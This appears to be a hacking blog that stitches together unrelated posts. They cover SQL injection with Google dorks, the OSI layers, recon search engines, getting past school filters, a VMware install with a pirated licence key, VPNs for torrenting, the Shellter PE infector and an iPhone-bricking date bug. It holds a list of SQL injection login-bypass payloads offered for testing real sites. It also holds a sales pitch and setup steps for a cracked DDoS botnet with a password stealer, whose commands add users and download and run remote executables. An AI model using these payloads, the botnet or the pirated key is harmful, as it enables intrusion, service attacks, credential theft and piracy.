Performing this kind of activity is illegal. Please refer the article for knowledge purpose.Blog owner is not responsible if any unethical activity will done.
Hello Guys, Following is the Google Dorks with SQL injection String for you to learn about the vulnerability of web sites.
kindly refer Google dork to look for vulnerable sites and use Sql string to check for vulnerability.
Performing this kind of activity is illegal. Please refer the article for knowledge purpose.Blog owner is not responsible if any unethical activity will done.
Hello Guys,
Here I am again for you with new article on Sql Injection.
Here I use Google Dorks to look for Vulnerable Sites for SQL Injection.
Note: you must know about Google hacking cheat sheet.
SQL Injection:
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
It is easy to remember the sequence of OSI Model Layer for common User.
The simple sentence is easy way to remember this model Layers i.e. “All people seems to need data processing”. Top to bottom
ALL= Application Layer
People= Presentation Layer
Seems= Session Layer
To= Transport Layer
Need = Network Layer
Data = Data Link Layer
Processing = Physical Layer
Application Layer (DATA)
Application Layer provides Interface between Users & machine.Protocols of this layers are: HTTP, HTTPS, FTP, TFTP, Telnet, SNMP, DNS, Rlogin, SMTP, POP3, IMAP, and LDAP.
Presentation Layer (DATA)
This layer facilitate in presentation of Data to upper layer. Mainly, Provide Encoding Scheme & Encryption formation. Protocols of this layers are: JPEG, BMP, GIF, TIF, PNG, MP3, MIDI, ASCII & ANSI etc.
Session Layer (DATA)
This layer provides virtual agreement between two end communication devices.Function of this layers: Establishment, Management & TerminationThe best example to explain this layer is telephone call in which first you established the connection, than exchange a message and finally terminate the session.Protocols of this Layer are: SIP, NFS, SQL, ASP, RDBMSThese three layer are named as software layer
Transport Layer (SEGMENT)
This layer is responsible for Control of Data flow and if error occur reconnect the data and retransmit.Function of this layers: 1) Handshaking 2). Acknowledgement 3). SequencingProtocols of this Layer: TCP, UDP, SPX
Network Layer (Packet)
This Layer is used for communication to remote network.Function of this layers: 1) Sorting 2) Filtering 3) DistributionProtocols of this Layer: Routed Protocol: IP/IPX/Apple talkRouting Protocol: IGP, EGP, BGP, EBGP, IBGP, RIP, IGRP, RIP, OPSF, IS-IS
Data Link Layer (Frame)
Function of this layers: 1) Error Detection 2) Control of DataUniqueness of this layer: MAC addressProtocols of this Layer: PPP, HDLC, ATM, Frame Relay, SLIP, Ethernet
Physical Layer(Binary)
This involve Media, move bits between devicesMAC Address: Information DeliveredIP Address: Carrier of Information
These four layers are Data Flow Layers Your Good comments Encourages me to keep posting Nice Articles so keep Commenting & Sharing
Hello Guys, Reconnaissance is the Pre-phase of Hacking life cycle. Hacker first initiate information Gathering/collection activity by Active & Passive Way. There are search engines available where attacker can get information about the target easily on Internet.
Information such as Port opened with additional details, geographical information, who.is info, services running, open-source security reports about phishing, malware, botnets and other malicious activities. Search for IP addresses or domains in our reputation database. I came across Following Search Engines listed as below:
https://cymon.io
https://exchange.xforce.ibmcloud.com
https://duckduckgo.com (Search Engine)
https://www.shodan.io
https://censys.io/
https://cymon.io
Cymon is the largest tracker of open-source security reports about phishing, malware, botnets and other malicious activities. Search for IP addresses or domains in our reputation database. Cymon ingests events and other malicious activities from almost 200 sources daily. On average, more than 15,000 unique IPs and 100,000 events are processed each day.
https://duckduckgo.com (Search Engine)
https://exchange.xforce.ibmcloud.com
IBM X-Force Exchange is a threat intelligence sharing platform enabling research on security threats, aggregation of intelligence, and collaboration with peers.
https://censys.io/
Censys is a search engine that allows computer scientists to ask questions about the devices and networks that compose the Internet. Driven by Internet-wide scanning, Censys lets researchers find specific hosts and create aggregate reports on how devices, websites, and certificates are configured and deployed. [more information
https://www.shodan.io
Shodan is the world's first search engine for Internet-connected devices
Benefits:
As an attacker you can collect information about your target passively.As an Security Analyst you can collect the information about the target whom attacking on your Company Infra.
Guys, If you know other Hackers Search Engines put the comment to other also know. Your Good comments Encourages me to keep posting Nice Articles so keep Commenting & Sharing
Always Video Streaming Sites are blocked at School. they are multiple ways to open the sites. like youtube is blocked at school. just follow following trick and get it open. Method #1
Goto https://translate.google.com
Type in Youtube.com or any other site that is blocked by your school
Now change the language on the right box to something other than English
And click on the link that appears on the right box
After it takes you to the page, on the top right corner click on "View: Original"
Done! Enjoy :)
Method #2
Head over to http://watchatschool.com
Enter the video title you want to watch (It selects the most relevant video to your search so be specific)
Now simply click search and it will bring you to a page with the YouTube video embedded!
Method #3
So on a school computer head on over to http://www.duckduckgo.com
Search whatever you want
Click Videos under the search bar
Find the video you want to watch and click on it
Hit "watch here"
DuckDuckGo is a search engine, and you can watch videos embedded in the results page. This will clear you on history checks and also allow you to view the videos your school filters have blocked.
Your Good comments Encourages me to keep posting Nice Articles so keep Commenting & Sharing
1. Download the VMware Workstation software binary from VMware official site. You will download script file like “VMware-Workstation-Full-11.0.0-2305329.x86_64.bundle”, by default this installer script file downloaded without execute permission, so you will need to give it in later step.
2. Go to the directory which contains the VMware Workstation binary file. File looks like “VMware-Workstation-Full-11.1.2-2780323.x86_64.bundle”.
3. Give execute permission for this installer file.
chmod +x VMware-Workstation-Full*.bundle
Step 3: Install VMWare Workstation on Kali Linux 2.0 Sana
1. Next, run the command below to begin the installation of VMware Workstation inside Kali Linux 2 1
./VMware-Workstation-Full-11*.bundle
2. Once the installer is running, you see the following window the screen.
Accept the license agreement to continue.
Follow normal process which we follow while installing Application in windows.
You may use License Key as below
5A02H-AU243-TZJ49-GTC7K-3C61N
Enjoy VMware Workstation 12 PRO Full Version For Free.Happy Learning :)
Your Good comments Encourages me to keep posting Nice Articles so keep Commenting & Sharing
or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
Credit: pentestlab Your Good comments Encourages me to keep posting Nice Articles so keep Commenting & Sharing
Torrents have become incredibly popular for sharing files online, and as networks continue to grow for P2P file sharing, increasingly more people are tuning in to this massive content sharing system. Of course, there are inherent security risks with any type of file sharing. This, coupled with the fact that the content of torrent files is usually something copyrighted, such as music or movies, is making users look deeper for ways to protect their privacy and stay anonymous.
Most people have at least basic anti-malware software installed on their devices, which is really helpful in screening files that may have viruses tucked away in them somewhere. However, this type of software really doesn’t do anything to secure your actual connection, it just secures your device.
Where there’s a will, there’s a way, and VPNs have answered the call. VPNs - Virtual Private Networks—offer users a secure and anonymous connection, along with global access to any content they want, regardless of their location. Not all VPNs are created equal though, and if you’re frequently downloading and sharing torrent files, you’re going to want a VPN that’s fast enough to get the job done.
Here are the top five VPNs for torrents and P2P file sharing, and how they compare in terms of price and connection quality.
#5. EarthVPN
Monthly Rate:$3.99
EarthVPN is a great, simple way to protect your privacy online. The connection is relatively fast - definitely fast enough for downloads - and the rates are some of the lowest you’ll find. Although the software is simple and the website doesn’t seem like much to look at, these guys offer loads of features and provide one of the better VPNs I’ve seen.
EarthVPN has the strongest 256-bit encryption available, so your connection is secure from snoops and hackers on public networks. You also get unlimited bandwidth, so there’s never any worry about hitting a monthly cap.The software is compatible with all major operating systems, and even allows three simultaneous connections, so you can use it on just about any device. The only real drawback? No live chat support.
#4. TunnelBear
Monthly Rate:$4.99
Okay, I am a huge fan of TunnelBear. The prices are low, the software is great, and let’s face it, the TunnelBear marketing gimmick is downright cute. These guys really know how to sell a product, and their product is awesome all the same.
TunnelBear’s encryption is tough stuff—256-bit and military grade, with settings in the software that you can use to optimize your connection for speed versus security. While TunnelBear is not compatible with Linux, it works on just about everything else—Windows, Mac, Android and iOS.What I love about TunnelBear is how easy it is to use. There is no manual connection configuration and no compressed files to mess with. It’s a simple download and install procedure. To top it all off, they even offer a free version to take for a spin before you sign up for a service plan.
#3. HideMyAss
Monthly Rate:$9.99
Where HideMyAss really shines is its server network. Often, the speed of your connection can really be impacted by the number of servers a VPN has. Too few and there’s not enough bandwidth to go around, not enough locations and you can have a hard time establishing a reliable connection. However, with servers in 190 countries, HideMyAss has one of the largest networks in the world.
With HideMyAss you get software that is compatible with just about every operating system but Linux. You can also use their software simultaneously on up to two devices.The customer support is really comprehensive too, with 24/7 help available on their live chat, phone and e-mail support lines. With unlimited bandwidth and a 30-day, money-back guarantee, there’s not much to lose by giving these guys a try.
#2. IPVanish
Monthly Rate:$10.00
IPVanish is another great VPN to try, with unlimited bandwidth and up to two simultaneous connections under one account. The one major drawback with these guys is that their software isn’t compatible with iOS, so mobile Apple users won’t have much use for it. However, they do offer 24/7 customer support, with a live chat feature on their website you can use for immediate assistance and an e-mail ticket system for less pressing issues. Plus, they offer a 7-day refund policy for customers who do not find the service works well for them. Like most other VPNs, IPVanish offers unlimited bandwidth and 256-bit encryption, plus a huge network of servers. Their network includes locations in 60 countries, so wherever you are, you should be able to connect with IPVanish.
#1. ExpressVPN
Monthly Rate: $12.95
ExpressVPN is definitely the best VPN I’ve ever seen. The software is incredibly simple and user-friendly, and the support staff is awesome when you need some assistance. They have the standard e-mail and live chat support, but what’s really incredible is that they usually get back to you within 20 minutes of sending them an e-mail—totally unheard of in this business.
The software works on all operating systems, including Linux, so you can use it seamlessly on all of your devices. It allows two simultaneous connections too—one on a mobile device and one on a home connection.
They offer a rock solid 30-day, money-back guarantee and will give you a refund—no questions asked—if you decide their service isn’t for you. If you do decide to keep it, you can even get a month of free service for you and a friend through their unique referral program.
Their connection is lightning fast, thanks to their massive server network, and with unlimited bandwidth, you’ll never have to worry about too many torrent downloads. Hands down, ExpressVPN is absolutely the best VPN for the job, and worth every penny.
Even if you only do your file sharing at home, most countries have government surveillance programs for internet users, so your connection is anything but anonymous. With a VPN, you get an IP address and access to remote servers to make your connection totally untraceable back to you. ExpressVPN is, in my opinion, the best VPN to keep you protected.
If you’re on public networks frequently, this software is particularly indispensable. These networks are absolute hotbeds of criminal activity, and hackers specifically target them to infiltrate your connection and steal your information. With an encrypted tunnel for your web traffic, your information stays secure from your device to the server.There’s no need to get paranoid and modify your routine—share away, my friends. But messing with torrent files can be a bit like a virtual game of hot potato, so be smart. Protect your devices with anti-malware software, and always use a VPN to keep things private and anonymous.
What is Shelter? Shellter is a dynamic shellcode injection tool aka dynamic PE infector. It can be used in order to inject shellcode into native Windows applications (currently 32-bit apps only). The shellcode can be something yours or something generated through a framework, such as Metasploit. Shellter takes advantage of the original structure of the PE file and doesn't apply any modification such as changing memory access permissions in sections (unless the user wants to), adding an extra section with RWE access, and whatever would look dodgy under an AV scan. Shellter is not just an EPO infector that tries to find a location to insert an instruction to redirect execution to the payload. Unlike any other infector, Shellter’s advanced infection engine never transfers the execution flow to a code cave or to an added section in the infected PE file. To read more Click here
This is new Bug most dangerous bug which brick your iPhone completely.
DANGER, Do NOT Try this. New iOS 9 & iOS 8 Bug Completely Bricks Your iPhone, iPad or iPod. Restoring Won't Fix This.
How to replicate the 1st Jan 1970 bug:
Simply open Settings
Go to General -> Date and Time
Uncheck ‘Set Automatically’
Change the date to 1st Jan 1970 (Scroll up to get to year 2000, then go back, into date settings again, repeat until it reaches 1970)
Reboot
Your Device should be bricked.
Why does this happen?
This is to do with something called ‘Unix Time‘, Unix Time is simply a way to track time, counting only in seconds. Unix Time counts the number of seconds that have elapsed since 1st Jan 1970 and is used universally across the world of technology. So therefore changing the date to 1st Jan 1970 would set this Unix Time to a value of ‘0’. Now, the bricking could be caused by the fact that iOS is dividing by this value to calculate the time and date and we all know that diving by 0 = RIP, it will cause a fault in the kernel which will make the device unable to boot. On the other hand, this could be due to using an unsigned int to represent the value, an unsigned int can only be using to hold values of positive numbers, and after calculations executed to calculate the date & time, the value could end up as a negative number.
This bug is being seen in iOS 8 – iOS 9.3 beta and only on 64-bit devices, I recommend that you do not try it as it fully bricks your device, you are not able to enter DFU mode, nor recovery mode, you will have to send your device to Apple, who will fix it even if it is not under a warranty as it is a software error, not hardware one. Some users are reporting that it isn’t working on their devices, mainly 6s users, however I still recommend that you do not try it.
The only known solution is removing your device’s battery, which is obviously not easy to do on Apple devices. Removing the battery resets the device’s PRAM, Parameter Random Access Memory and the SMC, System Management Controller. The PRAM holds the date and time information and is non-volatile, therefore needs all it’s power to be lost for it to be reset.
/u/Ziph0n has released a tweak on his repo called ‘BrickingDate’:
‘It prevents malicious users from replicating this “bug” manually. (The date can still be changed programmatically, but common users (bad friends…) can’t change the date this way)’
Features - Written in c + +, easily crypt is lightweight (compressed sample <15kb font="" nbsp=""> - Full compatibility with all windows family (x86 and x64) - Bot has 7 types of attacks - Extremely stable system. Load on CPU and ram is very powerful. - does not attract attention to UAC Windows Firewall - can install port, referal and cookies individually for each attack - Supports up to 10 targets simultaneously - has a very low load on the cpu with the new, complex system parsing Teams (all analogs parsing passes within a function in multiple threads - it's extra work load on the processor. New bot enters all data in the array before the attack and come ready function parameters: address, port, referral, etc.) - has enormous power output of more than 1500 http (and more 30,000 udp) requests per minute due to direct interaction with network drivers, even on Windows Desktop! (Only when using winsock) is about 10 times more than some analogues and several more top (on this indicator) competitors. - in the control panel are: the number of requests per minute, right in the system, the version of the system. - Supports bypassing Cloudflare protection (!) and many other, more simple. - support and slow get slow post! mode - indicated in the packet header off the cache (cache-control: no-cache), which increases the load on the server. - Bot protection of panel.
Modules: - PassGrabber (stealer): this module find and decrypt passwords. 26 software units supported (on octouber 2014). price $150 for base licence, $250 for lite licence, free for full. Detection: Validation build (without crypt and packing) only 3 AV’s of all triggered suspicion (avira, clamav, vba32). during local tests Kaspersky, nNod32, Drweb, Avast all missed file in 100% of cases.
Attack modes and commands: As the system is a professional syntax with commands, this seems complicated, but only at first glance =) • dd1 basic operation by http protocol method get, using sokkety. support *** cookies and $ $ $ ref and allows up to 10 targets simultaneously (separated by ";"). the fastest search volume attack. Example: DD1 = http://ya.ru cookies *** $ $ $ referal; http://mail.ru cookies2 *** $ $ $ referal2 • dd2 the same treatment as dd1, only the method of post. added optional parameter @ @ @ post_data. also supports up to 10 goals. Example: dd2 = http://forum.ru/index.php *** cookies $ $ $ referal @ @ @ login = yyy & password = hhh, this team posted a username and password yyy hhh a script
• dd3 attack http get method using the system library wininet.dll. good old attack used in many delphi bots. slow due to the limitations of desktop windows. not support the referral and cookies, supports up to 10 targets. Example: dd3 = http://host.com/script.php • dd4 attack http post method using the system library wininet. the same as dd3, only post. Example: DD4 = @ @ @ http://host.com/script.php @ @ @ = login & password = yyy hhh • dd5 icmp attack (pings). supports up to 10 targets. Example dd5 = 198.168.0.1; 199.0.0.1 • dd6 udp attack. supports up to 10 targets. mandatory parameters: port and text. Example: dd6 = 192.168.0.2:27015 @ @ @ flud_text • dd7 attack http get method using the system library urmon.dll average speed attack, supports up to 10 targets and does not support cookies and referal • cfa command bypass the security cloudflare (!). used only during dd7. This is simple - the bot executes java script gets the desired cookie and cloudflare considers requests made dd7 authorized. Example: dd7 = http://site.ru/index.php, then (after fifteen minutes) cfa = http://site.ru/index.php • cmd command is executed on the command interpreter cmd.exe on the local machine. does not stop the execution of other commands. Example: cmd = net user goodwin / add • exe command to load and run the exe file. does not stop the execution of other commands. file will be saved under the same name, under which he was on the Internet. made three attempts to download a file. Example: exe = http://site.com/filename.exe Control Panel: We used a modified ~ 70% from another complex (purchased under agreements to resell and change), rewriting it almost completely, as it was found too many mistakes and did not like the code. Naturally everything was corrected and optimized - new pu you like it! Demonstration: how well the system is very powerful and to demonstrate the need 15-20 bots, which are always available - Sellers will try to demonstrate power. Prices: - Test License $0 (only for checking the forums and testers. updates not provided) - Lite Licence $300 (update/rebuild $100, upgrade to the new version $ 100) - Basic License $500 (Update / Rebuild $ 50 upgrade to the new version $ 100, the price of the modules will be installed later) - full license $950 (all updates Rebuild and modules are free) INSTRUCTIONS: 1) Setup panel, read the howto included. (PS: Your MasterKey is: 0x2222) 2) Open the builder (do not open "madnesscracked.exe) 3) Write in URL in the builder, the url are usually http://yourdomain.com/index.php 4) Click Update URL, it will not give you any messagebox when you click it but it should now be ready to use. 5) Your file is madnesscracked.exe (after you update url)
